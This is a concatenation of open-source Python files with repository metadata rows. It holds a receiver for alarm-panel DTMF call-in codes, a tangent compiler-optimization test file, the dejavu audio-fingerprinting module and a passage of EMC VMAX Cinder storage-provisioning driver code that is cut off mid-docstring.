# There seems to be some buggyness with either TigerJet or the alarm system
# when sending the last checksum digit when its above 'c'
if len(code) == 15:
# XXX hack - Tigerjet can't detect the highest DTMF code of 15
if calc_checksum(code) == 0:
code += 'f'
# XXX hack - Tigerjet can't detect the high DTMF code of 14
if calc_checksum(code) == 1:
code += 'e'
if calc_checksum(code) == 2:
code += 'd'
codes.append((code, calc_checksum(code) == 0))
return codes
def collect_alarm_codes(fd):
logging.info("Collecting Alarm Codes")
code_str = ''
# Play the alarm handshake to start getting the codes
with handshake.Handshake():
off_hook, digit = get_phone_status(fd)
while off_hook:
code_str += format(digit, 'x') if digit != -1 else ''
off_hook, digit = get_phone_status(fd)
logging.info("Alarm Hung Up")
logging.info('Code String: %s', code_str)
return code_str
def validate_alarm_call_in(fd, expected):
number = '000'
off_hook, digit = get_phone_status(fd)
if off_hook:
logging.info("Phone Off The Hook")
while off_hook:
if digit != -1:
logging.debug("Digit %d", digit)
number = number[1:] + format(digit, 'x')
logging.debug("Number %s", number)
if number == expected:
logging.info("Alarm Call In Received")
break
off_hook, digit = get_phone_status(fd)
logging.debug("Number %s", number)
if not off_hook:
logging.info("Phone On The Hook")
return number == expected and off_hook
def get_phone_status(fd):
status = bytearray(fd.read(2))
digit = status[0]
if digit < 11:
digit = digit - 1
off_hook = ((status[1] & 0x80) == 0x80)
return (off_hook, digit)
def handle_alarm_calling(fd, number):
codes = []
if validate_alarm_call_in(fd, number):
code_str = collect_alarm_codes(fd)
codes = parse_alarm_codes(code_str)
return codes
| apache-2.0 | 6,096,464,687,842,636,000 | 26.801724 | 83 | 0.613953 | false |
google/tangent | tests/test_optimization.py | 1 | 2734 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gast
import pytest
from tangent import optimization
from tangent import quoting
def test_assignment_propagation():
def f(x):
y = x
z = y
return z
node = quoting.parse_function(f)
node = optimization.assignment_propagation(node)
assert len(node.body[0].body) == 2
def test_dce():
def f(x):
y = 2 * x
return x
node = quoting.parse_function(f)
node = optimization.dead_code_elimination(node)
assert isinstance(node.body[0].body[0], gast.Return)
def test_fixed_point():
def f(x):
y = g(x)
z = h(y)
return x
node = quoting.parse_function(f)
node = optimization.optimize(node)
assert isinstance(node.body[0].body[0], gast.Return)
def test_constant_folding():
def f(x):
x = 1 * x
x = 0 * x
x = x * 1
x = x * 0
x = x * 2
x = 2 * x
x = 2 * 3
x = 1 + x
x = 0 + x
x = x + 1
x = x + 0
x = x + 2
x = 2 + x
x = 2 + 3
x = 1 - x
x = 0 - x
x = x - 1
x = x - 0
x = x - 2
x = 2 - x
x = 2 - 3
x = 1 / x
x = 0 / x
x = x / 1
x = x / 0
x = x / 2
x = 2 / x
x = 2 / 8
x = 1 ** x
x = 0 ** x
x = x ** 1
x = x ** 0
x = x ** 2
x = 2 ** x
x = 2 ** 3
def f_opt(x):
x = x
x = 0
x = x
x = 0
x = x * 2
x = 2 * x
x = 6
x = 1 + x
x = x
x = x + 1
x = x
x = x + 2
x = 2 + x
x = 5
x = 1 - x
x = -x
x = x - 1
x = x
x = x - 2
x = 2 - x
x = -1
x = 1 / x
x = 0 / x
x = x
x = x / 0
x = x / 2
x = 2 / x
x = 0.25
x = 1
x = 0
x = x
x = 1
x = x ** 2
x = 2 ** x
x = 8
node = quoting.parse_function(f)
node = optimization.constant_folding(node)
node_opt = quoting.parse_function(f_opt)
lines = quoting.to_source(node).strip().split('\n')[1:]
lines_opt = quoting.to_source(node_opt).strip().split('\n')[1:]
# In Python 2 integer division could be on, in which case...
if 1 / 2 == 0:
lines_opt[27] = ' x = 0'
assert lines == lines_opt
if __name__ == '__main__':
assert not pytest.main([__file__])
| apache-2.0 | 2,331,356,449,715,369,500 | 18.528571 | 79 | 0.517191 | false |
huytd/dejavu | dejavu/fingerprint.py | 1 | 6020 | import numpy as np
import matplotlib.mlab as mlab
import matplotlib.pyplot as plt
from scipy.ndimage.filters import maximum_filter
from scipy.ndimage.morphology import (generate_binary_structure,
iterate_structure, binary_erosion)
import hashlib
from operator import itemgetter
IDX_FREQ_I = 0
IDX_TIME_J = 1
######################################################################
# Sampling rate, related to the Nyquist conditions, which affects
# the range frequencies we can detect.
DEFAULT_FS = 44100
######################################################################
# Size of the FFT window, affects frequency granularity
DEFAULT_WINDOW_SIZE = 4096
######################################################################
# Ratio by which each sequential window overlaps the last and the
# next window. Higher overlap will allow a higher granularity of offset
# matching, but potentially more fingerprints.
DEFAULT_OVERLAP_RATIO = 0.5
######################################################################
# Degree to which a fingerprint can be paired with its neighbors --
# higher will cause more fingerprints, but potentially better accuracy.
DEFAULT_FAN_VALUE = 15
######################################################################
# Minimum amplitude in spectrogram in order to be considered a peak.
# This can be raised to reduce number of fingerprints, but can negatively
# affect accuracy.
DEFAULT_AMP_MIN = 10
######################################################################
# Number of cells around an amplitude peak in the spectrogram in order
# for Dejavu to consider it a spectral peak. Higher values mean less
# fingerprints and faster matching, but can potentially affect accuracy.
PEAK_NEIGHBORHOOD_SIZE = 20
######################################################################
# Thresholds on how close or far fingerprints can be in time in order
# to be paired as a fingerprint. If your max is too low, higher values of
# DEFAULT_FAN_VALUE may not perform as expected.
MIN_HASH_TIME_DELTA = 0
MAX_HASH_TIME_DELTA = 200
######################################################################
# If True, will sort peaks temporally for fingerprinting;
# not sorting will cut down number of fingerprints, but potentially
# affect performance.
PEAK_SORT = True
######################################################################
# Number of bits to throw away from the front of the SHA1 hash in the
# fingerprint calculation. The more you throw away, the less storage, but
# potentially higher collisions and misclassifications when identifying songs.
FINGERPRINT_REDUCTION = 20
def fingerprint(channel_samples, Fs=DEFAULT_FS,
wsize=DEFAULT_WINDOW_SIZE,
wratio=DEFAULT_OVERLAP_RATIO,
fan_value=DEFAULT_FAN_VALUE,
amp_min=DEFAULT_AMP_MIN):
"""
FFT the channel, log transform output, find local maxima, then return
locally sensitive hashes.
"""
# FFT the signal and extract frequency components
arr2D = mlab.specgram(
channel_samples,
NFFT=wsize,
Fs=Fs,
window=mlab.window_hanning,
noverlap=int(wsize * wratio))[0]
# apply log transform since specgram() returns linear array
arr2D = 10 * np.log10(arr2D)
arr2D[arr2D == -np.inf] = 0 # replace infs with zeros
# find local maxima
local_maxima = get_2D_peaks(arr2D, plot=False, amp_min=amp_min)
# return hashes
return generate_hashes(local_maxima, fan_value=fan_value)
def get_2D_peaks(arr2D, plot=False, amp_min=DEFAULT_AMP_MIN):
# http://docs.scipy.org/doc/scipy/reference/generated/scipy.ndimage.morphology.iterate_structure.html#scipy.ndimage.morphology.iterate_structure
struct = generate_binary_structure(2, 1)
neighborhood = iterate_structure(struct, PEAK_NEIGHBORHOOD_SIZE)
# find local maxima using our fliter shape
local_max = maximum_filter(arr2D, footprint=neighborhood) == arr2D
background = (arr2D == 0)
eroded_background = binary_erosion(background, structure=neighborhood,
border_value=1)
# Boolean mask of arr2D with True at peaks
detected_peaks = local_max - eroded_background
# extract peaks
amps = arr2D[detected_peaks]
j, i = np.where(detected_peaks)
# filter peaks
amps = amps.flatten()
peaks = zip(i, j, amps)
peaks_filtered = [x for x in peaks if x[2] > amp_min] # freq, time, amp
# get indices for frequency and time
frequency_idx = [x[1] for x in peaks_filtered]
time_idx = [x[0] for x in peaks_filtered]
if plot:
# scatter of the peaks
fig, ax = plt.subplots()
ax.imshow(arr2D)
ax.scatter(time_idx, frequency_idx)
ax.set_xlabel('Time')
ax.set_ylabel('Frequency')
ax.set_title("Spectrogram")
plt.gca().invert_yaxis()
plt.show()
return zip(frequency_idx, time_idx)
def generate_hashes(peaks, fan_value=DEFAULT_FAN_VALUE):
"""
Hash list structure:
sha1_hash[0:20] time_offset
[(e05b341a9b77a51fd26, 32), ... ]
"""
fingerprinted = set() # to avoid rehashing same pairs
if PEAK_SORT:
peaks.sort(key=itemgetter(1))
for i in range(len(peaks)):
for j in range(1, fan_value):
if (i + j) < len(peaks) and not (i, i + j) in fingerprinted:
freq1 = peaks[i][IDX_FREQ_I]
freq2 = peaks[i + j][IDX_FREQ_I]
t1 = peaks[i][IDX_TIME_J]
t2 = peaks[i + j][IDX_TIME_J]
t_delta = t2 - t1
if t_delta >= MIN_HASH_TIME_DELTA and t_delta <= MAX_HASH_TIME_DELTA:
h = hashlib.sha1(
"%s|%s|%s" % (str(freq1), str(freq2), str(t_delta)))
yield (h.hexdigest()[0:FINGERPRINT_REDUCTION], t1)
# ensure we don't repeat hashing
fingerprinted.add((i, i + j))
| mit | -8,347,237,291,707,981,000 | 36.391304 | 148 | 0.589535 | false |
bswartz/cinder | cinder/volume/drivers/emc/emc_vmax_provision_v3.py | 1 | 35993 | # Copyright (c) 2012 - 2015 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
from oslo_concurrency import lockutils
from oslo_log import log as logging
import six
from cinder import exception
from cinder.i18n import _, _LE, _LW
from cinder.volume.drivers.emc import emc_vmax_utils
LOG = logging.getLogger(__name__)
STORAGEGROUPTYPE = 4
POSTGROUPTYPE = 3
EMC_ROOT = 'root/emc'
THINPROVISIONINGCOMPOSITE = 32768
THINPROVISIONING = 5
INFO_SRC_V3 = 3
ACTIVATESNAPVX = 4
DEACTIVATESNAPVX = 19
SNAPSYNCTYPE = 7
class EMCVMAXProvisionV3(object):
"""Provisioning Class for SMI-S based EMC volume drivers.
This Provisioning class is for EMC volume drivers based on SMI-S.
It supports VMAX arrays.
"""
def __init__(self, prtcl):
self.protocol = prtcl
self.utils = emc_vmax_utils.EMCVMAXUtils(prtcl)
def delete_volume_from_pool(
self, conn, storageConfigservice, volumeInstanceName, volumeName,
extraSpecs):
"""Given the volume instance remove it from the pool.
:param conn: connection to the ecom server
:param storageConfigservice: volume created from job
:param volumeInstanceName: the volume instance name
:param volumeName: the volume name (String)
:param extraSpecs: additional info
:returns: int -- return code
:raises: VolumeBackendAPIException
"""
startTime = time.time()
if isinstance(volumeInstanceName, list):
theElements = volumeInstanceName
volumeName = 'Bulk Delete'
else:
theElements = [volumeInstanceName]
rc, job = conn.InvokeMethod(
'ReturnElementsToStoragePool', storageConfigservice,
TheElements=theElements)
if rc != 0:
rc, errordesc = self.utils.wait_for_job_complete(conn, job,
extraSpecs)
if rc != 0:
exceptionMessage = (_(
"Error Delete Volume: %(volumeName)s. "
"Return code: %(rc)lu. Error: %(error)s.")
% {'volumeName': volumeName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
LOG.debug("InvokeMethod ReturnElementsToStoragePool took: "
"%(delta)s H:MM:SS.",
{'delta': self.utils.get_time_delta(startTime,
time.time())})
return rc
def create_volume_from_sg(
self, conn, storageConfigService, volumeName,
sgInstanceName, volumeSize, extraSpecs):
"""Create the volume and associate it with a storage group.
We use EMCCollections parameter to supply a Device Masking Group
to contain a newly created storage volume.
:param conn: the connection information to the ecom server
:param storageConfigService: the storage configuration service
:param volumeName: the volume name (String)
:param sgInstanceName: the storage group instance name
associated with an SLO
:param volumeSize: volume size (String)
:param extraSpecs: additional info
:returns: dict -- volumeDict - the volume dict
:returns: int -- return code
:raises: VolumeBackendAPIException
"""
try:
storageGroupInstance = conn.GetInstance(sgInstanceName)
except Exception:
exceptionMessage = (_(
"Unable to get the name of the storage group"))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
@lockutils.synchronized(storageGroupInstance['ElementName'],
"emc-sg-", True)
def do_create_volume_from_sg():
startTime = time.time()
rc, job = conn.InvokeMethod(
'CreateOrModifyElementFromStoragePool',
storageConfigService, ElementName=volumeName,
EMCCollections=[sgInstanceName],
ElementType=self.utils.get_num(THINPROVISIONING, '16'),
Size=self.utils.get_num(volumeSize, '64'))
LOG.debug("Create Volume: %(volumename)s. Return code: %(rc)lu.",
{'volumename': volumeName,
'rc': rc})
if rc != 0:
rc, errordesc = self.utils.wait_for_job_complete(conn, job,
extraSpecs)
if rc != 0:
exceptionMessage = (_(
"Error Create Volume: %(volumeName)s. "
"Return code: %(rc)lu. Error: %(error)s.")
% {'volumeName': volumeName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
LOG.debug("InvokeMethod CreateOrModifyElementFromStoragePool "
"took: %(delta)s H:MM:SS.",
{'delta': self.utils.get_time_delta(startTime,
time.time())})
# Find the newly created volume.
volumeDict = self.get_volume_dict_from_job(conn, job['Job'])
return volumeDict, rc
return do_create_volume_from_sg()
def _find_new_storage_group(
self, conn, maskingGroupDict, storageGroupName):
"""After creating an new storage group find it and return it.
:param conn: connection to the ecom server
:param maskingGroupDict: the maskingGroupDict dict
:param storageGroupName: storage group name (String)
:returns: maskingGroupDict['MaskingGroup'] or None
"""
foundStorageGroupInstanceName = None
if 'MaskingGroup' in maskingGroupDict:
foundStorageGroupInstanceName = maskingGroupDict['MaskingGroup']
return foundStorageGroupInstanceName
def get_volume_dict_from_job(self, conn, jobInstance):
"""Given the jobInstance determine the volume Instance.
:param conn: the ecom connection
:param jobInstance: the instance of a job
:returns: dict -- volumeDict - an instance of a volume
"""
associators = conn.Associators(
jobInstance,
ResultClass='EMC_StorageVolume')
if len(associators) > 0:
return self.create_volume_dict(associators[0].path)
else:
exceptionMessage = (_(
"Unable to get storage volume from job."))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(data=exceptionMessage)
def get_volume_from_job(self, conn, jobInstance):
"""Given the jobInstance determine the volume Instance.
:param conn: the ecom connection
:param jobInstance: the instance of a job
:returns: dict -- volumeDict - an instance of a volume
"""
associators = conn.Associators(
jobInstance,
ResultClass='EMC_StorageVolume')
if len(associators) > 0:
return associators[0]
else:
exceptionMessage = (_(
"Unable to get storage volume from job."))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(data=exceptionMessage)
def create_volume_dict(self, volumeInstanceName):
"""Create volume dictionary
:param volumeInstanceName: the instance of a job
:returns: dict -- volumeDict - an instance of a volume
"""
volpath = volumeInstanceName
volumeDict = {}
volumeDict['classname'] = volpath.classname
keys = {}
keys['CreationClassName'] = volpath['CreationClassName']
keys['SystemName'] = volpath['SystemName']
keys['DeviceID'] = volpath['DeviceID']
keys['SystemCreationClassName'] = volpath['SystemCreationClassName']
volumeDict['keybindings'] = keys
return volumeDict
def create_element_replica(
self, conn, repServiceInstanceName,
cloneName, syncType, sourceInstance, extraSpecs,
targetInstance=None, rsdInstance=None):
"""Make SMI-S call to create replica for source element.
:param conn: the connection to the ecom server
:param repServiceInstanceName: replication service
:param cloneName: clone volume name
:param syncType: 7=snapshot, 8=clone
:param sourceInstance: source volume instance
:param extraSpecs: additional info
:param targetInstance: Target volume instance. Default None
:param rsdInstance: replication settingdata instance. Default None
:returns: int -- rc - return code
:returns: job - job object of the replica creation operation
:raises: VolumeBackendAPIException
"""
startTime = time.time()
LOG.debug("Create replica: %(clone)s "
"syncType: %(syncType)s Source: %(source)s.",
{'clone': cloneName,
'syncType': syncType,
'source': sourceInstance.path})
storageSystemName = sourceInstance['SystemName']
__, __, sgInstanceName = (
self.utils.get_v3_default_sg_instance_name(
conn, extraSpecs[self.utils.POOL],
extraSpecs[self.utils.SLO],
extraSpecs[self.utils.WORKLOAD], storageSystemName))
try:
storageGroupInstance = conn.GetInstance(sgInstanceName)
except Exception:
exceptionMessage = (_(
"Unable to get the name of the storage group"))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
@lockutils.synchronized(storageGroupInstance['ElementName'],
"emc-sg-", True)
def do_create_element_replica():
if targetInstance is None and rsdInstance is None:
rc, job = conn.InvokeMethod(
'CreateElementReplica', repServiceInstanceName,
ElementName=cloneName,
SyncType=self.utils.get_num(syncType, '16'),
SourceElement=sourceInstance.path,
Collections=[sgInstanceName])
else:
rc, job = self._create_element_replica_extra_params(
conn, repServiceInstanceName, cloneName, syncType,
sourceInstance, targetInstance, rsdInstance,
sgInstanceName)
if rc != 0:
rc, errordesc = self.utils.wait_for_job_complete(conn, job,
extraSpecs)
if rc != 0:
exceptionMessage = (_(
"Error Create Cloned Volume: %(cloneName)s "
"Return code: %(rc)lu. Error: %(error)s.")
% {'cloneName': cloneName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
LOG.debug("InvokeMethod CreateElementReplica "
"took: %(delta)s H:MM:SS.",
{'delta': self.utils.get_time_delta(startTime,
time.time())})
return rc, job
return do_create_element_replica()
def _create_element_replica_extra_params(
self, conn, repServiceInstanceName, cloneName, syncType,
sourceInstance, targetInstance, rsdInstance, sgInstanceName):
"""CreateElementReplica using extra parameters.
:param conn: the connection to the ecom server
:param repServiceInstanceName: replication service
:param cloneName: clone volume name
:param syncType: 7=snapshot, 8=clone
:param sourceInstance: source volume instance
:param targetInstance: Target volume instance. Default None
:param rsdInstance: replication settingdata instance. Default None
:param sgInstanceName: pool instance name
:returns: int -- rc - return code
:returns: job - job object of the replica creation operation
"""
syncType = self.utils.get_num(syncType, '16')
if targetInstance and rsdInstance:
rc, job = conn.InvokeMethod(
'CreateElementReplica', repServiceInstanceName,
ElementName=cloneName,
SyncType=syncType,
SourceElement=sourceInstance.path,
TargetElement=targetInstance.path,
ReplicationSettingData=rsdInstance)
elif targetInstance:
rc, job = conn.InvokeMethod(
'CreateElementReplica', repServiceInstanceName,
ElementName=cloneName,
SyncType=syncType,
SourceElement=sourceInstance.path,
TargetElement=targetInstance.path)
elif rsdInstance:
rc, job = conn.InvokeMethod(
'CreateElementReplica', repServiceInstanceName,
ElementName=cloneName,
SyncType=syncType,
SourceElement=sourceInstance.path,
ReplicationSettingData=rsdInstance,
Collections=[sgInstanceName])
return rc, job
def break_replication_relationship(
self, conn, repServiceInstanceName, syncInstanceName,
operation, extraSpecs, force=False):
"""Deletes the relationship between the clone/snap and source volume.
Makes an SMI-S call to break clone relationship between the clone
volume and the source.
:param conn: the connection to the ecom server
:param repServiceInstanceName: instance name of the replication service
:param syncInstanceName: instance name of the
SE_StorageSynchronized_SV_SV object
:param operation: operation code
:param extraSpecs: additional info
:param force: force to break replication relationship if True
:returns: rc - return code
:returns: job - job object of the replica creation operation
"""
LOG.debug("Break replication relationship: %(sv)s "
"operation: %(operation)s.",
{'sv': syncInstanceName, 'operation': operation})
return self._modify_replica_synchronization(
conn, repServiceInstanceName, syncInstanceName, operation,
extraSpecs, force)
def create_storage_group_v3(self, conn, controllerConfigService,
groupName, srp, slo, workload, extraSpecs):
"""Create the volume in the specified pool.
:param conn: the connection information to the ecom server
:param controllerConfigService: the controller configuration service
:param groupName: the group name (String)
:param srp: the SRP (String)
:param slo: the SLO (String)
:param workload: the workload (String)
:param extraSpecs: additional info
:returns: storageGroupInstanceName - storage group instance name
"""
startTime = time.time()
@lockutils.synchronized(groupName, "emc-sg-", True)
def do_create_storage_group_v3():
if slo and workload:
rc, job = conn.InvokeMethod(
'CreateGroup',
controllerConfigService,
GroupName=groupName,
Type=self.utils.get_num(4, '16'),
EMCSRP=srp,
EMCSLO=slo,
EMCWorkload=workload)
else:
rc, job = conn.InvokeMethod(
'CreateGroup',
controllerConfigService,
GroupName=groupName,
Type=self.utils.get_num(4, '16'))
if rc != 0:
rc, errordesc = self.utils.wait_for_job_complete(
conn, job, extraSpecs)
if rc != 0:
LOG.error(_LE(
"Error Create Group: %(groupName)s. "
"Return code: %(rc)lu. Error: %(error)s."),
{'groupName': groupName,
'rc': rc,
'error': errordesc})
raise
LOG.debug("InvokeMethod CreateGroup "
"took: %(delta)s H:MM:SS.",
{'delta': self.utils.get_time_delta(startTime,
time.time())})
foundStorageGroupInstanceName = self._find_new_storage_group(
conn, job, groupName)
return foundStorageGroupInstanceName
return do_create_storage_group_v3()
def get_storage_pool_capability(self, conn, poolInstanceName):
"""Get the pool capability.
:param conn: the connection information to the ecom server
:param poolInstanceName: the pool instance
:returns: the storage pool capability instance. None if not found
"""
storagePoolCapability = None
associators = (
conn.AssociatorNames(poolInstanceName,
ResultClass='Symm_StoragePoolCapabilities'))
if len(associators) > 0:
storagePoolCapability = associators[0]
return storagePoolCapability
def get_storage_pool_setting(
self, conn, storagePoolCapability, slo, workload):
"""Get the pool setting for pool capability.
:param conn: the connection information to the ecom server
:param storagePoolCapability: the storage pool capability instance
:param slo: the slo string e.g Bronze
:param workload: the workload string e.g DSS_REP
:returns: the storage pool setting instance
"""
foundStoragePoolSetting = None
storagePoolSettings = (
conn.AssociatorNames(storagePoolCapability,
ResultClass='CIM_storageSetting'))
for storagePoolSetting in storagePoolSettings:
settingInstanceID = storagePoolSetting['InstanceID']
matchString = ("%(slo)s:%(workload)s"
% {'slo': slo,
'workload': workload})
if matchString in settingInstanceID:
foundStoragePoolSetting = storagePoolSetting
break
if foundStoragePoolSetting is None:
exceptionMessage = (_(
"The array does not support the storage pool setting "
"for SLO %(slo)s and workload %(workload)s. Please "
"check the array for valid SLOs and workloads.")
% {'slo': slo,
'workload': workload})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return foundStoragePoolSetting
def _get_supported_size_range_for_SLO(
self, conn, storageConfigService,
srpPoolInstanceName, storagePoolSettingInstanceName, extraSpecs):
"""Gets available performance capacity per SLO.
:param conn: the connection information to the ecom server
:param storageConfigService: the storage configuration service instance
:param srpPoolInstanceName: the SRP storage pool instance
:param storagePoolSettingInstanceName: the SLO type, e.g Bronze
:param extraSpecs: additional info
:returns: dict -- supportedSizeDict - the supported size dict
:raises: VolumeBackendAPIException
"""
startTime = time.time()
rc, supportedSizeDict = conn.InvokeMethod(
'GetSupportedSizeRange',
srpPoolInstanceName,
ElementType=self.utils.get_num(3, '16'),
Goal=storagePoolSettingInstanceName)
if rc != 0:
rc, errordesc = self.utils.wait_for_job_complete(
conn, supportedSizeDict, extraSpecs)
if rc != 0:
exceptionMessage = (_(
"Cannot get supported size range for %(sps)s "
"Return code: %(rc)lu. Error: %(error)s.")
% {'sps': storagePoolSettingInstanceName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
LOG.debug("InvokeMethod GetSupportedSizeRange "
"took: %(delta)s H:MM:SS.",
{'delta': self.utils.get_time_delta(startTime,
time.time())})
return supportedSizeDict
def get_volume_range(
self, conn, storageConfigService, poolInstanceName, slo, workload,
extraSpecs):
"""Get upper and lower range for volume for slo/workload combination.
:param conn: the connection information to the ecom server
:param storageConfigService: the storage config service
:param poolInstanceName: the pool instance
:param slo: slo string e.g Bronze
:param workload: workload string e.g DSS
:param extraSpecs: additional info
:returns: supportedSizeDict
"""
supportedSizeDict = {}
storagePoolCapabilityInstanceName = self.get_storage_pool_capability(
conn, poolInstanceName)
if storagePoolCapabilityInstanceName:
storagePoolSettingInstanceName = self.get_storage_pool_setting(
conn, storagePoolCapabilityInstanceName, slo, workload)
supportedSizeDict = self._get_supported_size_range_for_SLO(
conn, storageConfigService, poolInstanceName,
storagePoolSettingInstanceName, extraSpecs)
return supportedSizeDict
def activate_snap_relationship(
self, conn, repServiceInstanceName, syncInstanceName, extraSpecs):
"""Activate snap relationship and start copy operation.
:param conn: the connection to the ecom server
:param repServiceInstanceName: instance name of the replication service
:param syncInstanceName: instance name of the
SE_StorageSynchronized_SV_SV object
:param extraSpecs: additional info
:returns: int -- return code
:returns: job object of the replica creation operation
"""
# Operation 4: activate the snapVx.
operation = ACTIVATESNAPVX
LOG.debug("Activate snap: %(sv)s operation: %(operation)s.",
{'sv': syncInstanceName, 'operation': operation})
return self._modify_replica_synchronization(
conn, repServiceInstanceName, syncInstanceName, operation,
extraSpecs)
def return_to_resource_pool(self, conn, repServiceInstanceName,
syncInstanceName, extraSpecs):
"""Return the snap target resources back to the pool.
:param conn: the connection to the ecom server
:param repServiceInstanceName: instance name of the replication service
:param syncInstanceName: instance name of the
:param extraSpecs: additional info
:returns: rc - return code
:returns: job object of the replica creation operation
"""
# Operation 4: activate the snapVx.
operation = DEACTIVATESNAPVX
LOG.debug("Return snap resource back to pool: "
"%(sv)s operation: %(operation)s.",
{'sv': syncInstanceName, 'operation': operation})
return self._modify_replica_synchronization(
conn, repServiceInstanceName, syncInstanceName, operation,
extraSpecs)
def _modify_replica_synchronization(
self, conn, repServiceInstanceName, syncInstanceName,
operation, extraSpecs, force=False):
"""Modify the relationship between the clone/snap and source volume.
Helper function that makes an SMI-S call to break clone relationship
between the clone volume and the source.
:param conn: the connection to the ecom server
:param repServiceInstanceName: instance name of the replication service
:param syncInstanceName: instance name of the
SE_StorageSynchronized_SV_SV object
:param operation: operation code
:param extraSpecs: additional info
:param force: force to modify replication synchronization if True
:returns: int -- return code
:returns: job object of the replica creation operation
:raises: VolumeBackendAPIException
"""
startTime = time.time()
rc, job = conn.InvokeMethod(
'ModifyReplicaSynchronization', repServiceInstanceName,
Operation=self.utils.get_num(operation, '16'),
Synchronization=syncInstanceName,
Force=force)
LOG.debug("_modify_replica_synchronization: %(sv)s "
"operation: %(operation)s Return code: %(rc)lu.",
{'sv': syncInstanceName, 'operation': operation, 'rc': rc})
if rc != 0:
rc, errordesc = self.utils.wait_for_job_complete(conn, job,
extraSpecs)
if rc != 0:
exceptionMessage = (_(
"Error modify replica synchronization: %(sv)s "
"operation: %(operation)s. "
"Return code: %(rc)lu. Error: %(error)s.")
% {'sv': syncInstanceName, 'operation': operation,
'rc': rc, 'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
LOG.debug("InvokeMethod ModifyReplicaSynchronization "
"took: %(delta)s H:MM:SS.",
{'delta': self.utils.get_time_delta(startTime,
time.time())})
return rc, job
def create_group_replica(
self, conn, replicationService,
srcGroupInstanceName, tgtGroupInstanceName, relationName,
extraSpecs):
"""Make SMI-S call to create replica for source group.
:param conn: the connection to the ecom server
:param replicationService: replication service
:param srcGroupInstanceName: source group instance name
:param tgtGroupInstanceName: target group instance name
:param relationName: replica relationship name
:param extraSpecs: additional info
:returns: int -- return code
:returns: job object of the replica creation operation
:raises: VolumeBackendAPIException
"""
LOG.debug(
"Creating CreateGroupReplica V3: "
"replicationService: %(replicationService)s "
"RelationName: %(relationName)s "
"sourceGroup: %(srcGroup)s "
"targetGroup: %(tgtGroup)s.",
{'replicationService': replicationService,
'relationName': relationName,
'srcGroup': srcGroupInstanceName,
'tgtGroup': tgtGroupInstanceName})
rc, job = conn.InvokeMethod(
'CreateGroupReplica',
replicationService,
RelationshipName=relationName,
SourceGroup=srcGroupInstanceName,
TargetGroup=tgtGroupInstanceName,
SyncType=self.utils.get_num(SNAPSYNCTYPE, '16'))
if rc != 0:
rc, errordesc = self.utils.wait_for_job_complete(conn, job,
extraSpecs)
if rc != 0:
exceptionMsg = (_("Error CreateGroupReplica: "
"source: %(source)s target: %(target)s. "
"Return code: %(rc)lu. Error: %(error)s.")
% {'source': srcGroupInstanceName,
'target': tgtGroupInstanceName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMsg)
raise exception.VolumeBackendAPIException(data=exceptionMsg)
return rc, job
def get_srp_pool_stats(self, conn, arrayInfo):
"""Get the totalManagedSpace, remainingManagedSpace.
:param conn: the connection to the ecom server
:param arrayInfo: the array dict
:returns: totalCapacityGb
:returns: remainingCapacityGb
"""
totalCapacityGb = -1
remainingCapacityGb = -1
storageSystemInstanceName = self.utils.find_storageSystem(
conn, arrayInfo['SerialNumber'])
srpPoolInstanceNames = conn.AssociatorNames(
storageSystemInstanceName,
ResultClass='Symm_SRPStoragePool')
for srpPoolInstanceName in srpPoolInstanceNames:
poolnameStr = self.utils.get_pool_name(conn, srpPoolInstanceName)
if six.text_type(arrayInfo['PoolName']) == (
six.text_type(poolnameStr)):
try:
# Check that pool hasn't suddently been deleted.
srpPoolInstance = conn.GetInstance(srpPoolInstanceName)
propertiesList = srpPoolInstance.properties.items()
for properties in propertiesList:
if properties[0] == 'TotalManagedSpace':
cimProperties = properties[1]
totalManagedSpace = cimProperties.value
totalCapacityGb = self.utils.convert_bits_to_gbs(
totalManagedSpace)
elif properties[0] == 'RemainingManagedSpace':
cimProperties = properties[1]
remainingManagedSpace = cimProperties.value
remainingCapacityGb = (
self.utils.convert_bits_to_gbs(
remainingManagedSpace))
except Exception:
pass
remainingSLOCapacityGb = (
self._get_remaining_slo_capacity_wlp(
conn, srpPoolInstanceName, arrayInfo,
storageSystemInstanceName['Name']))
if remainingSLOCapacityGb != -1:
remainingCapacityGb = remainingSLOCapacityGb
else:
LOG.warning(_LW(
"Remaining capacity %(remainingCapacityGb)s "
"GBs is determined from SRP pool capacity "
"and not the SLO capacity. Performance may "
"not be what you expect."),
{'remainingCapacityGb': remainingCapacityGb})
return totalCapacityGb, remainingCapacityGb
def _get_remaining_slo_capacity_wlp(self, conn, srpPoolInstanceName,
arrayInfo, systemName):
"""Get the remaining SLO capacity.
This is derived from the WLP portion of Unisphere. Please
see the SMIProvider doc and the readme doc for details.
:param conn: the connection to the ecom server
:param srpPoolInstanceName: SRP instance name
:param arrayInfo: the array dict
:param systemName: the system name
